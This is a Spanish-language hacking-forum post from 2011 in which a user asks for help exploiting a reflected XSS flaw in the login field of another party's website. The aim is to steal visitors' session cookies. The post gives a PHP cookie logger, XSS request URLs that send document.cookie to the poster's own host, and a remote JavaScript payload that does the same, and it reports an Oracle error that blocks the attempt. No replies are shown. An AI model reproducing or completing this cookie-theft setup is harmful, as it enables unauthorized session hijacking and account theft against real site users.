elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Problema con XSS "java.sql.SQLException"
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema con XSS "java.sql.SQLException"  (Leído 3,183 veces)
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Problema con XSS "java.sql.SQLException"
« en: 20 Marzo 2011, 17:48 pm »

Hola a todos bueno les cuento estaba un poco aburrido y se me ocurrió indagar un poco y retomé con los xss y encontré una página con una vulnerabilidad xss
pero no en su buscador si no que en una parte para hacer login (Exactamente en la ID)
al momento de logearme erroneamente (poniendo una ID falsa y una clave) me marcaba el usuario xxx no existe, por lo que probé con codigos htm y walá tenia xss
así que preparé el escenario.. Subi mi cookie.php (http://lapaginaquetengo.com/cookies.php) con el siguiente código

Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("datos.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

la petición:

Código:
http://paginaconxss/cmol2008/serv/Iconsystem.Login?P_USUARIO=<script>window.location='http://paginamiaconcookie.com/cookies.php?cookie='+document.cookie;</script>&P_PASS=default&Submit=Aceptar

Pero al hacer las pruebas me Devuelve:
Citar
java.sql.SQLException
ORA-00907: missing right parenthesis

Y peor no se crea datos.txt con la información
La página tiene centos,está bajo Oracle y apache 2.2.3
Espero su ayuda muchas gracias por tomarse el tiempo de leer

EDIT:Buscando por internet, lei algo como colocar esto:
Código:
<script src=Http://host.com/javascript.js></script>
Cuando cargo la página introduciendo el script que mencioné anteriormente me sale que está cargando host.com/... por lo que creo que este método es factible corriganme si me equivoco, pero el problema surge en ¿que codigo.js debo colocar para poder adquirir la cookie del visitante?, si alguien me lo pudiera explicar se lo agradeceria, muchas gracias :D

EDIT2:
Encontré un codigo en js
hice lo siguiente:
Código:
<script language="javascript">
document.location="http://paginaquetengo.com/cookies.php?cookie=" + document.cookie;
</script>      
                                                                   

1-Lo guardé como login.js en http://paginaquetengo.com/login.js
junto con el cookie.php que anteriormente mencioné (http://lapaginaquetengo.com/cookies.php)
2-introducí en la página prueba:

Código:
http://paginaconxss/cmol2008/serv/Iconsystem.Login?P_USUARIO=<script src=http://paginaquetengo.com/login.js></script>&P_PASS=default&Submit=Aceptar
Carga diciendo usuario no existe, verifico mi página pero esta no tiene el log (la página tiene la opción de escritura habilitada)

Espero ansiosamente su ayuda gracias x.x
« Última modificación: 20 Marzo 2011, 19:58 pm por bikutoru123 » En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
"""BUSCO EJEMPLO VB PARA ENVIAR MAILS""""
Programación Visual Basic
gera 1 6,635 Último mensaje 1 Septiembre 2005, 00:14 am
por programatrix
De donde puedo descargar utilidades: "Formas", "Estilos", "Motivos", D
Diseño Gráfico
Ad0nis 2 8,906 Último mensaje 2 Septiembre 2006, 15:48 pm
por Ad0nis
[Ayuda] modificar "start page" en "internet explorer" con "batch"
Scripting
taton 7 17,378 Último mensaje 20 Septiembre 2006, 01:45 am
por taton
Propiedad "Interprete"/"Artista"/"Autor" de una canción
Windows
Castg! 4 9,406 Último mensaje 16 Junio 2010, 07:58 am
por Roy-Mustang
Problema en Java con Linux 2 "Unsoported major.minor version 51.0"
Java
z3nth10n 0 1,661 Último mensaje 17 Julio 2012, 20:34 pm
por z3nth10n
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines